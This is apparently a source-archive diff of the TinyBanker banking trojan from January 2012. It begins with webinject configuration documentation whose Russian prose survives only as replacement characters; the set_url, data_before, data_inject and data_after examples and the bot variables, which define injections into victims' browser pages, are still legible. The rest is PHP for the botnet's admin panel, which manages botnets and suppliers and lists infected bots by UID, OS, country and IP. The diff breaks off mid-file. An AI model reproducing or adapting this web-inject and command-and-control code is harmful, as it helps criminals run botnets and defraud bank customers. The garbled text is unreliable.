data_end
data_before
<body
data_end
DATA_INJECT
New Title
DATA_END
data_inject
>New Body
data_end
<EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_after <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_after <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject. <20> <20>.<2E>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #3. <20><><EFBFBD><EFBFBD><EFBFBD>:
set_url *Ya.Ru* GP
data_before
<T?T?E>
data_end
data_inject
MASK
data_end
data_after
</*>
data_end
<EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> ya.ru (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) <20><><EFBFBD> GET <20> POST <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> MASK <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <T?T?E> <20> </*>. <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <title> <20> </title>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #4. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ GPL
data_before
<title>
data_end
data_inject
Grabbed Title
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> http://ya.ru/ <20><><EFBFBD> GET <20> POST <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <title> <20> </title> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Grabbed Title.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> data_inject
%BOTUID% (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
%BOTDATA_varname% (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> varname
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> GET <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %SAVEDATA_varname=777% - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 777 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> varname
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: http://microsoft.com/?blabla%SAVEDATA_var1=one%blabla%SAVEDATA_var2=two%blabla
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> L <20> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #1. <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
<title>
data_end
data_inject
#1
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> data_inject
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #2. <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
data_end
data_inject
data_end
data_after
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #3. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD>, data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
data_end
data_inject
#3
data_end
data_after
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> data_inject
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #4. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD>, data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
<title>
data_end
data_inject
data_end
data_after
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #5. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_inject <20><><EFBFBD><EFBFBD><EFBFBD>, data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
data_end
data_inject
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #6. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, data_inject <20><><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
<title>
data_end
data_inject
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #7. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, data_before <20><><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
data_end
data_inject
#7
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_after
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_after <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> data_inject
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #8. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_before <20> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, data_after <20><><EFBFBD><EFBFBD>:
set_url http://ya.ru/ G(L)
data_before
<title>
data_end
data_inject
#8
data_end
data_after
data_end
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_inject <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before
(L)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> data_before <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> data_inject

1
malwares/Source/Original/TinyBanker_Jan2012/admin/.htaccess Normal file
View File

@@ -0,0 +1 @@
Options -Indexes

1
malwares/Source/Original/TinyBanker_Jan2012/admin/control/AJAX_REQUEST_LOG.txt Normal file
View File

@@ -0,0 +1 @@
logs_ids=&bots_uids=&from_date=logs_120424&to_date=logs_120424&from_time=&to_time=&ip_mask%5B%5D=&ip_mask%5B%5D=&ip_mask%5B%5D=&ip_mask%5B%5D=&phrase=&limit=999

44
malwares/Source/Original/TinyBanker_Jan2012/admin/control/botnets.act.php Normal file
View File

@@ -0,0 +1,44 @@
<?php
if (!BOT) exit();
if (isset($_POST['botnet'])) {
if (array_key_exists($_POST['botnet'], $BOTNETS)) exit('Botnet name already exist');
if (strlen($_POST['botnet']) > 12) exit('Botnet name too long');
if (!preg_match("/^[a-zA-Z0-9_]+$/", $_POST['botnet'])) exit('Botnet name tabcontains forbidden symbols');
if (strlen($_POST['passwd']) > 16) exit('Botnet password too long');
if (!preg_match("/^[a-zA-Z0-9_]+$/", $_POST['passwd'])) exit('Botnet password tabcontains forbidden symbols');
if (strlen($_POST['comment']) > 128) exit('Comment too long');
if ($_POST['comment']!='' and !preg_match("/^[a-zA-Z0-9\s.,_]+$/", $_POST['comment'])) exit('Comment tabcontains forbidden symbols');
$fp = fopen('../data/titles/botnets.php', 'a');
flock($fp, LOCK_EX);
fwrite ($fp, " \$BOTNETS['{$_POST['botnet']}'] = array('password' => '{$_POST['passwd']}', 'comment' => '{$_POST['comment']}');\n");
flock($fp, LOCK_UN);
fclose ($fp);
exit('success');
}
if (isset($_POST['supplier'])) {
if (array_key_exists($_POST['supplier'], $SUPPLIERS)) exit('Supplier name already exist');
if (strlen($_POST['supplier']) > 12) exit('Supplier name too long');
if (!preg_match("/^[a-zA-Z0-9_]+$/", $_POST['supplier'])) exit('Supplier name tabcontains forbidden symbols');
if (strlen($_POST['comment']) > 128) exit('Comment too long');
if ($_POST['comment']!='' and !preg_match("/^[a-zA-Z0-9\s.,_]+$/", $_POST['comment'])) exit('Comment tabcontains forbidden symbols');
$fp = fopen('../data/titles/suppliers.php', 'a');
flock($fp, LOCK_EX);
fwrite ($fp, " \$SUPPLIERS['{$_POST['supplier']}'] = array('comment' => '{$_POST['comment']}');\n");
flock($fp, LOCK_UN);
fclose ($fp);
exit('success');
}
exit();
?>

58
malwares/Source/Original/TinyBanker_Jan2012/admin/control/botnets.botnets.php Normal file
View File

@@ -0,0 +1,58 @@
<?php
if (!BOT) exit();
print "<table id='botnets' cellspacing=1 cellpadding=0 class='block'>
<tr class='bothdr'>
<td width=15%>BotNET</td>
<td width=15%>Password</td>
<td width=10%>Bots</td>
<td width=60%>Comment</td>
</tr>\n\n";
reset($BOTNETS);
while ($val = current($BOTNETS)) {
$key = key($BOTNETS);
print "<tr class='botstr'>
<td align=left>[ <b>{$key}</b> ]</td>
<td>{$val['password']}</td>
<td>200000</td>
<td>{$val['comment']}</td>
</tr>\n";
next($BOTNETS);
}
print "</table>
<form id='newbotnet'>
<table cellspacing=1 cellpadding=0 class='block'>
<tr>
<td width=15%><input type='text' name='botnet' maxlength=12 id='botnet'></td>
<td width=15%><input type='text' name='passwd' maxlength=16 id='passwd'></td>
<td width=60%><input type='text' name='comment' maxlength=128 id='comment'></td>
<td width=10%><input type='submit' value='Add new botnet' class='srchbtn'></td>
</tr>
</table>
</form>
<script>
$('#newbotnet').submit(function() {
var frm = $(this);
if ($(frm).find('#botnet').val() == '') { alert('Botnet name is not specified'); return false; }
if ($(frm).find('#passwd').val() == '') { alert('Botnet password is not specified'); return false; }
$(frm).find(':submit').attr('disabled', true);
$.post('?botnets', $(frm).serialize(), function(data) {
if (data == 'success') $('#botnets').append('<tr class=\'botstr\'><td align=left>[ <b>'+$(frm).find('#botnet').val()+'</b> ]</td><td>'+$(frm).find('#passwd').val()+'</td><td>200000</td><td>'+$(frm).find('#comment').val()+'</td></tr>');
else alert(data);
$(frm).find(':submit').attr('disabled', false);
});
return false;
});
</script>\n\n\n";
?>

45
malwares/Source/Original/TinyBanker_Jan2012/admin/control/botnets.bots.php Normal file
View File

@@ -0,0 +1,45 @@
<?php
if (!BOT) exit();
print "<table cellspacing=1 cellpadding=0 class=block>
<tr class=bothdr>
<td width=15%>UID</td>
<td width=4%>OS</td>
<td width=10%>[ISO] Country</td>
<td width=10%>IP</td>
<td width=10%>Time</td>
<td width=10%>Botnet</td>
<td width=10%>Supplier (sub)</td>
<td width=25%>Comment</td>
<td width=6%>Control</td>
</tr>\n";
$result = mysql_query("SELECT * FROM `bots` LIMIT 50;") or die("Query failed : " . mysql_error());
while ($row = mysql_fetch_array($result)) {
print "<tr class=botstr>
<td class=botleft><div style='width:180px;'>{$row['bot_uid']}</div></td>
<td>{$row['bot_os']}</td>
<td class=botleft><div style='width:119px;'>[{$row['bot_country']}] {$GeoIP->GEOIP_COUNTRY_NAMES[$GeoIP->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['bot_country']]]}</div></td>
<td>{$row['bot_ip']}</td>
<td>".date("d/m/Y - H:i:s", $row['time_last'])."</td>
<td><div style='width:119px;'>[ {$row['bot_net']} ]</div></td>
<td><div style='width:119px;'>[ {$row['bot_supp']} ] ({$row['supp_sub']})</div></td>
<td class=botleft><div style='width:303px;'>{$row['comment']}</div></td>
<td>000</td>
</tr>\n";
}
print "</table>
<script>
</script>\n\n\n";
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/botnets.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "botnets.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>BOTs</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>BotNETs</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Suppliers</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "botnets.bots.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "botnets.botnets.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "botnets.suppliers.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

57
malwares/Source/Original/TinyBanker_Jan2012/admin/control/botnets.suppliers.php Normal file
View File

@@ -0,0 +1,57 @@
<?php
if (!BOT) exit();
print "<table id='suppliers' cellspacing=1 cellpadding=0 class='block'>
<tr class='bothdr'>
<td width=15%>Supplier</td>
